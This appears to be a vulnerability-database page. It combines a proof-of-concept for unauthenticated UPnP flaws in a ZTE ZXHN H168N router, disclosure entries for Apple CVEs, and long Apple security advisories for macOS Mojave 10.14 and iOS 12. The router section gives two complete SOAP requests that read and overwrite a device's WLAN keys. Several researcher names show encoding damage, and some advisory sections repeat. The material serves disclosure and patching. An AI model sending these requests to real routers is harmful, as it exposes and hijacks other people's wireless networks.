Disclaimer: [This POC is for Educational Purposes , I would Not be
responsible for any misuse of the information mentioned in this blog post]
[+] Unauthenticated
[+] Author: Usman Saeed (usman [at] xc0re.net)
[+] Protocol: UPnP
[+] Affected Harware/Software:
Model name: ZXHN H168N v2.2
Build Timestamp: 20171127193202
Software Version: V2.2.0_PK1.2T5
[+] Findings:
1. Unauthenticated access to WLAN password:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 288
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys" 1
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"></u:GetSecurityKeys></s:Body></s:Envelope>
2. Unauthenticated WLAN passphrase change:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 496
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>
[*] Solution:
UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.
[*] Note:
There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.
[+] Responsible Disclosure:
Vulnerabilities identified - 20 August, 2018
Reported to ZTE - 28 August, 2018
ZTE official statement - 17 September 2018
ZTE patched the vulnerability - 12 November 2018
The operator pushed the update - 12 November 2018
CVE published - CVE- 2018-7357 and CVE-2018-7358
Public disclosure - 12 November 2018
Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522
| VAR-201904-1428 | CVE-2018-4338 | macOS Input validation vulnerability |
CVSS V2: 4.3 CVSS V3: 5.5 Severity: MEDIUM |
A validation issue was addressed with improved input sanitization. This issue affected versions prior to macOS Mojave 10.14. Apple From macOS An update for has been released.The potential impact depends on each vulnerability, but may be affected as follows: * Arbitrary code execution * information leak * Access restriction bypass. This vulnerability allows local attackers to disclose sensitive information on vulnerable installations of Apple macOS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the handling of the Broadcom Airport kext. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the kernel. Apple iOS is prone to multiple security vulnerabilities.
Attackers can exploit these issues to gain sensitive information, bypass security mechanisms, and conduct spoofing attacks and perform unauthorized actions. Wi-Fi is one of the wireless Internet access components. An attacker could exploit this vulnerability to read restricted memory. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2018-10-30-9 Additional information for
APPLE-SA-2018-9-24-1 macOS Mojave 10.14
macOS Mojave 10.14 addresses the following:
Bluetooth
Available for: iMac (21.5-inch, Late 2012), iMac (27-inch, Late 2012)
, iMac (21.5-inch, Late 2013), iMac (21.5-inch, Mid 2014), iMac
(Retina 5K, 27-inch, Late 2014), iMac (21.5-inch, Late 2015),
Mac mini (Mid 2011), Mac mini Server (Mid 2011), Mac mini (Late 2012)
, Mac mini Server (Late 2012), Mac mini (Late 2014), Mac Pro
(Late 2013), MacBook Air (11-inch, Mid 2011), MacBook Air
(13-inch, Mid 2011), MacBook Air (11-inch, Mid 2012), MacBook Air
(13-inch, Mid 2012), MacBook Air (11-inch, Mid 2013), MacBook Air
(13-inch, Mid 2013), MacBook Air (11-inch, Early 2015), MacBook Air
(13-inch, Early 2015), MacBook Pro (13-inch, Mid 2012), MacBook Pro
(15-inch, Mid 2012), MacBook Pro (Retina, 13-inch, Early 2013),
MacBook Pro (Retina, 15-inch, Early 2013), MacBook Pro (Retina,
13-inch, Late 2013), and MacBook Pro (Retina, 15-inch, Late 2013)
Impact: An attacker in a privileged network position may be able to
intercept Bluetooth traffic
Description: An input validation issue existed in Bluetooth.
CVE-2018-5383: Lior Neumann and Eli Biham
The updates below are available for these Mac models:
MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later),
MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later),
iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013, Mid 2010, and Mid 2012 models with recommended
Metal-capable graphics processor, including MSI Gaming Radeon RX 560
and Sapphire Radeon PULSE RX 580)
afpserver
Impact: A remote attacker may be able to attack AFP servers through
HTTP clients
Description: An input validation issue was addressed with improved
input validation.
CVE-2018-4295: Jianjun Chen (@whucjj) from Tsinghua University and UC
Berkeley
Entry added October 30, 2018
App Store
Impact: A malicious application may be able to determine the Apple ID
of the owner of the computer
Description: A permissions issue existed in the handling of the Apple
ID.
CVE-2018-4324: Sergii Kryvoblotskyi of MacPaw Inc.
CVE-2018-4417: Lee of the Information Security Lab Yonsei University
working with Trend Micro's Zero Day Initiative
Entry added October 30, 2018
Application Firewall
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: A configuration issue was addressed with additional
restrictions.
CVE-2018-4353: Abhinav Bansal of LinkedIn Inc.
APR
Impact: Multiple buffer overflow issues existed in Perl
Description: Multiple issues in Perl were addressed with improved
memory handling.
CVE-2017-12613: Craig Young of Tripwire VERT
CVE-2017-12618: Craig Young of Tripwire VERT
Entry added October 30, 2018
ATS
Impact: A malicious application may be able to elevate privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4411: lilang wu moony Li of Trend Micro working with Trend
Micro's Zero Day Initiative
Entry added October 30, 2018
ATS
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2018-4308: Mohamed Ghannam (@_simo36)
Entry added October 30, 2018
Auto Unlock
Impact: A malicious application may be able to access local users
AppleIDs
Description: A validation issue existed in the entitlement
verification.
CVE-2018-4321: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
CFNetwork
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4126: Bruno Keith (@bkth_) working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
CoreFoundation
Impact: A malicious application may be able to elevate privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4412: The UK's National Cyber Security Centre (NCSC)
Entry added October 30, 2018
CoreFoundation
Impact: An application may be able to gain elevated privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4414: The UK's National Cyber Security Centre (NCSC)
Entry added October 30, 2018
CoreText
Impact: Processing a maliciously crafted text file may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2018-4333: Brandon Azad
CUPS
Impact: In certain configurations, a remote attacker may be able to
replace the message content from the print server with arbitrary
content
Description: An injection issue was addressed with improved
validation.
CVE-2018-4153: Michael Hanselmann of hansmi.ch
Entry added October 30, 2018
CUPS
Impact: An attacker in a privileged position may be able to perform a
denial of service attack
Description: A denial of service issue was addressed with improved
validation.
CVE-2018-4406: Michael Hanselmann of hansmi.ch
Entry added October 30, 2018
Dictionary
Impact: Parsing a maliciously crafted dictionary file may lead to
disclosure of user information
Description: A validation issue existed which allowed local file
access.
CVE-2018-4346: Wojciech ReguAa (@_r3ggi) of SecuRing
Entry added October 30, 2018
Grand Central Dispatch
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4426: Brandon Azad
Entry added October 30, 2018
Heimdal
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4331: Brandon Azad
CVE-2018-4332: Brandon Azad
CVE-2018-4343: Brandon Azad
Entry added October 30, 2018
Hypervisor
Impact: Systems with microprocessors utilizing speculative execution
and address translations may allow unauthorized disclosure of
information residing in the L1 data cache to an attacker with local
user access with guest OS privilege via a terminal page fault and a
side-channel analysis
Description: An information disclosure issue was addressed by
flushing the L1 data cache at the virtual machine entry.
CVE-2018-3646: Baris Kasikci, Daniel Genkin, Ofir Weisse, and Thomas
F. Wenisch of University of Michigan, Mark Silberstein and Marina
Minkin of Technion, Raoul Strackx, Jo Van Bulck, and Frank Piessens
of KU Leuven, Rodrigo Branco, Henrique Kawakami, Ke Sun, and Kekai Hu
of Intel Corporation, Yuval Yarom of The University of Adelaide
Entry added October 30, 2018
iBooks
Impact: Parsing a maliciously crafted iBooks file may lead to
disclosure of user information
Description: A configuration issue was addressed with additional
restrictions.
CVE-2018-4396: Yu Wang of Didi Research America
CVE-2018-4418: Yu Wang of Didi Research America
Entry added October 30, 2018
Intel Graphics Driver
Impact: An application may be able to read restricted memory
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2018-4351: Appology Team @ Theori working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
Intel Graphics Driver
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4350: Yu Wang of Didi Research America
Entry added October 30, 2018
Intel Graphics Driver
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4334: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOHIDFamily
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A memory corruption issue was addressed with improved
input validation
CVE-2018-4408: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOKit
Impact: A malicious application may be able to break out of its
sandbox
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4341: Ian Beer of Google Project Zero
CVE-2018-4354: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOKit
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2018-4383: Apple
Entry added October 30, 2018
IOUserEthernet
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4401: Apple
Entry added October 30, 2018
Kernel
Impact: A malicious application may be able to leak sensitive user
information
Description: An access issue existed with privileged API calls.
CVE-2018-4399: Fabiano Anemone (@anoane)
Entry added October 30, 2018
Kernel
Impact: An attacker in a privileged network position may be able to
execute arbitrary code
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4407: Kevin Backhouse of Semmle Ltd.
Entry added October 30, 2018
Kernel
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4336: Brandon Azad
CVE-2018-4337: Ian Beer of Google Project Zero
CVE-2018-4340: Mohamed Ghannam (@_simo36)
CVE-2018-4344: The UK's National Cyber Security Centre (NCSC)
CVE-2018-4425: cc working with Trend Micro's Zero Day Initiative,
Juwei Lin (@panicaII) of Trend Micro working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
LibreSSL
Impact: Multiple issues in libressl were addressed in this update
Description: Multiple issues were addressed by updating to libressl
version 2.6.4.
CVE-2015-3194
CVE-2015-5333
CVE-2015-5334
CVE-2016-702
Entry added October 30, 2018
Login Window
Impact: A local user may be able to cause a denial of service
Description: A validation issue was addressed with improved logic.
CVE-2018-4348: Ken Gannon of MWR InfoSecurity and Christian Demko of
MWR InfoSecurity
Entry added October 30, 2018
mDNSOffloadUserClient
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4326: an anonymous researcher working with Trend Micro's
Zero Day Initiative, Zhuo Liang of Qihoo 360 Nirvan Team
Entry added October 30, 2018
MediaRemote
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2018-4310: CodeColorist of Ant-Financial LightYear Labs
Entry added October 30, 2018
Microcode
Impact: Systems with microprocessors utilizing speculative execution
and speculative execution of memory reads before the addresses of all
prior memory writes are known may allow unauthorized disclosure of
information to an attacker with local user access via a side-channel
analysis
Description: An information disclosure issue was addressed with a
microcode update. This ensures that older data read from
recently-written-to addresses cannot be read via a speculative
side-channel.
CVE-2018-3639: Jann Horn (@tehjh) of Google Project Zero (GPZ), Ken
Johnson of the Microsoft Security Response Center (MSRC)
Entry added October 30, 2018
Security
Impact: A local user may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2018-4395: Patrick Wardle of Digita Security
Entry added October 30, 2018
Security
Impact: An attacker may be able to exploit weaknesses in the RC4
cryptographic algorithm
Description: This issue was addressed by removing RC4.
CVE-2016-1777: Pepi Zawodsky
Spotlight
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4393: Lufeng Li
Entry added October 30, 2018
Symptom Framework
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2018-4203: Bruno Keith (@bkth_) working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
Text
Impact: Processing a maliciously crafted text file may lead to a
denial of service
Description: A denial of service issue was addressed with improved
validation.
CVE-2018-4338: Lee @ SECLAB, Yonsei University working with Trend
Micro's Zero Day Initiative
Entry added October 30, 2018
Additional recognition
Accessibility Framework
We would like to acknowledge Ryan Govostes for their assistance.
Core Data
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
CoreDAV
We would like to acknowledge an anonymous researcher for their
assistance.
CoreGraphics
We would like to acknowledge Nitin Arya of Roblox Corporation for
their assistance.
CoreSymbolication
We would like to acknowledge Brandon Azad for their assistance.
IOUSBHostFamily
We would like to acknowledge an anonymous researcher for their
assistance.
Kernel
We would like to acknowledge Brandon Azad for their assistance.
Mail
We would like to acknowledge Alessandro Avagliano of Rocket Internet
SE, John Whitehead of The New York Times, Kelvin Delbarre of Omicron
Software Systems, and Zbyszek A>>A3Akiewski for their assistance.
Quick Look
We would like to acknowledge Wojciech ReguAa (@_r3ggi) of SecuRing
and Patrick Wardle of Digita Security and lokihardt of Google Project
Zero for their assistance.
Security
We would like to acknowledge Christoph Sinai, Daniel Dudek
(@dannysapples) of The Irish Times and Filip KlubiAka (@lemoncloak)
of ADAPT Centre, Dublin Institute of Technology, Istvan Csanady of
Shapr3D, Omar Barkawi of ITG Software, Inc., Phil Caleno, Wilson
Ding, and an anonymous researcher for their assistance.
SQLite
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
Terminal
We would like to acknowledge an anonymous researcher for their
assistance.
WindowServer
We would like to acknowledge Patrick Wardle of Digita Security for
their assistance.
Installation note:
macOS Mojave 10.14 may be obtained from the Mac App Store or
Apple's Software Downloads web site:
https://support.apple.com/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlvYkgYpHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3GrtxAA
iVBcAdusz88zFzkT05EIxb9nSp4CGOlhKlChK4N7Db17o2fNT0hNpQixEAC0wC/A
zqIzsXEzZlPobI4OnwiEVs7lVBsvCW+IarrRZ8pgSllKs1VlbNfOO3z9vB5BqJMr
d9PjPvtHyG3jZmWqQPIjvJb3l3ZjHAt+HAvTItNMkhIUjqV80JI8wP3erzIf3tAt
VoLIw5iL5w4HAYcWsn9DYcecXZdv39MnKL5UGzMX3bkee2U7kGYtgskU+mdPa1Wl
WzquIPlLeKL2KNSXEfbkPtcKM/fvkURsNzEDvg+PBQLdI3JeR1bOeN24aiTEtiEL
TecGm/kKMMJWmDdhPhFvZVD+SIdZd4LgbTawR1UE1JJg7jnEZKCvZ45mXd2eBwn/
rpEKCLBsgA59GILs3ZjZSIWskRJPzZrt463AKcN2wukkTUUkY1rhRVdOf6LZMs9Z
w9iJOua3vt+HzCCxTEaH53WUeM6fn/Yeq+DGIS5Fk0G09pU7tsyJVwj3o1nJn0dl
e2mcrXBJeSmi6bvvkJX45y/Y8E8Qr+ovS4uN8wG6DOWcCBQkDkugabng8vNh8GST
1wNnV9JY/CmYbU0ZIwKbbSDkcQLQuIl7kKaZMHnU74EytcKscUqqx1VqINz1tssu
1wZZGLtg3VubrZOsnUZzumD+0nI8c6QAnQK3P2PSZ0k=
=i9YR
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2018-9-24-4 Additional information for
APPLE-SA-2018-9-17-1 iOS 12
iOS 12 addresses the following:
Accounts
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local app may be able to read a persistent account
identifier
Description: This issue was addressed with improved entitlements.
Entry added September 24, 2018
Bluetooth
Available for: iPhone SE, iPhone 6s, iPhone 6s Plus, iPhone 7,
iPhone 7 Plus, iPad Mini 4, 12.9-inch iPad Pro 1st generation,
12.9-inch iPad Pro 2nd generation, 10.5-inch iPad Pro,
9.7-inch iPad Pro, iPad 5th generation, and iPod Touch 6th generation
Impact: An attacker in a privileged network position may be able to
intercept Bluetooth traffic
Description: An input validation issue existed in Bluetooth.
CVE-2018-5383: Lior Neumann and Eli Biham
CoreMedia
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An app may be able to learn information about the current
camera view before being granted camera access
Description: A permissions issue existed.
CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert Ulu
of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi - Ankara/TA1/4rkiye,
Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l University, Metin Altug
Karakaya of Kaliptus Medical Organization, Vinodh Swami of Western
Governor's University (WGU)
Notes
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted notes
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4352: an anonymous researcher
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover websites a user has
visited
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert Ulu
of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi - Ankara/TA1/4rkiye,
Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l University, Metin Altug
Karakaya of Kaliptus Medical Organization, Vinodh Swami of Western
Governor's University (WGU)
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A user may be unable to delete browsing history items
Description: Clearing a history item may not clear visits with
redirect chains.
CVE-2018-4329: Hugo S. Diaz (coldpointblue)
SafariViewController
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Visiting a malicious website may lead to address bar spoofing
Description: An inconsistent user interface issue was addressed with
improved state management.
CVE-2018-4362: Jun Kokatsu (@shhnjk)
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to exfiltrate autofilled data
in Safari
Description: A logic issue was addressed with improved state
management.
CVE-2016-1777: Pepi Zawodsky
Status Bar
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A person with physical access to an iOS device may be able to
determine the last used app from the lock screen
Description: A logic issue was addressed with improved restrictions.
CVE-2018-4191: found by OSS-Fuzz
Entry added September 24, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Cross-origin SecurityErrors includes the accessed frame's
origin
Description: The issue was addressed by removing origin information.
CVE-2018-4311: Erling Alf Ellingsen (@steike)
Entry added September 24, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to execute scripts in the
context of another website
Description: A cross-site scripting issue existed in Safari.
Status Bar
We would like to acknowledge Ju Zhu of Meituan and Moony Li and
Lilang Wu of Trend Micro for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 12"
| VAR-201904-1420 | CVE-2018-4329 | iOS and Safari Vulnerability in history with redirect chain cannot be deleted |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Clearing a history item may not clear visits with redirect chains. The issue was addressed with improved data deletion. This issue affected versions prior to iOS 12, Safari 12. iOS and Safari Has a flaw in the process of deleting data, so there is a vulnerability where the history with the redirect chain cannot be deleted even if the browsing items are deleted.Information may be obtained. Apple iOS and Safari are prone to multiple security vulnerabilities.
Successfully exploiting these issues may allow an attacker to bypass certain security restrictions and perform unauthorized actions. Apple iOS is an operating system developed for mobile devices. Safari is a web browser developed as the default browser included with MacOSX and iOS operating systems. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2018-10-30-8 Additional information for
APPLE-SA-2018-9-24-4 iOS 12
iOS 12 addresses the following:
Accounts
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local app may be able to read a persistent account
identifier
Description: This issue was addressed with improved entitlements.
CVE-2018-4322: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
Auto Unlock
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to access local users
AppleIDs
Description: A validation issue existed in the entitlement
verification.
CVE-2018-4321: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
Bluetooth
Available for: iPhone SE, iPhone 6s, iPhone 6s Plus, iPhone 7,
iPhone 7 Plus, iPad Mini 4, 12.9-inch iPad Pro 1st generation,
12.9-inch iPad Pro 2nd generation, 10.5-inch iPad Pro,
9.7-inch iPad Pro, iPad 5th generation, and iPod Touch 6th generation
Impact: An attacker in a privileged network position may be able to
intercept Bluetooth traffic
Description: An input validation issue existed in Bluetooth.
CVE-2018-5383: Lior Neumann and Eli Biham
CFNetwork
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4126: Bruno Keith (@bkth_) working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
CoreFoundation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4412: The UK's National Cyber Security Centre (NCSC)
Entry added October 30, 2018
CoreFoundation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to gain elevated privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4414: The UK's National Cyber Security Centre (NCSC)
Entry added October 30, 2018
CoreMedia
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An app may be able to learn information about the current
camera view before being granted camera access
Description: A permissions issue existed.
CVE-2018-4356: an anonymous researcher
CoreText
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted text file may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2018-4347: an anonymous researcher
Entry added October 30, 2018
Crash Reporter
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4333: Brandon Azad
Grand Central Dispatch
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4426: Brandon Azad
Entry added October 30, 2018
Heimdal
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4331: Brandon Azad
CVE-2018-4332: Brandon Azad
CVE-2018-4343: Brandon Azad
Entry added October 30, 2018
iBooks
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Parsing a maliciously crafted iBooks file may lead to
disclosure of user information
Description: A configuration issue was addressed with additional
restrictions.
CVE-2018-4355: evi1m0 of bilibili security team
Entry added October 30, 2018
IOHIDFamily
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A memory corruption issue was addressed with improved
input validation
CVE-2018-4408: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to break out of its
sandbox
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4341: Ian Beer of Google Project Zero
CVE-2018-4354: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2018-4383: Apple
Entry added October 30, 2018
IOMobileFrameBuffer
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4335: Brandon Azad
IOUserEthernet
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4401: Apple
Entry added October 30, 2018
iTunes Store
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker in a privileged network position may be able to
spoof password prompts in the iTunes Store
Description: An input validation issue was addressed with improved
input validation.
CVE-2018-4305: Jerry Decime
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to leak sensitive user
information
Description: An access issue existed with privileged API calls.
CVE-2018-4399: Fabiano Anemone (@anoane)
Entry added October 30, 2018
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: An input validation issue existed in the kernel.
CVE-2018-4363: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker in a privileged network position may be able to
execute arbitrary code
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4407: Kevin Backhouse of Semmle Ltd.
Entry added October 30, 2018
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4336: Brandon Azad
CVE-2018-4337: Ian Beer of Google Project Zero
CVE-2018-4340: Mohamed Ghannam (@_simo36)
CVE-2018-4344: The UK's National Cyber Security Centre (NCSC)
CVE-2018-4425: cc working with Trend Micro's Zero Day Initiative,
Juwei Lin (@panicaII) of Trend Micro working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
mDNSOffloadUserClient
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4326: an anonymous researcher working with Trend Micro's
Zero Day Initiative, Zhuo Liang of Qihoo 360 Nirvan Team
Entry added October 30, 2018
MediaRemote
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2018-4310: CodeColorist of Ant-Financial LightYear Labs
Entry added October 30, 2018
Messages
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted
messages
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert
Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi -
Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l
University, Metin Altug Karakaya of Kaliptus Medical Organization,
Vinodh Swami of Western Governor's University (WGU)
Notes
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted notes
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4352: Utku Altinkaynak
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover websites a user has
visited
Description: A consistency issue existed in the handling of
application snapshots.
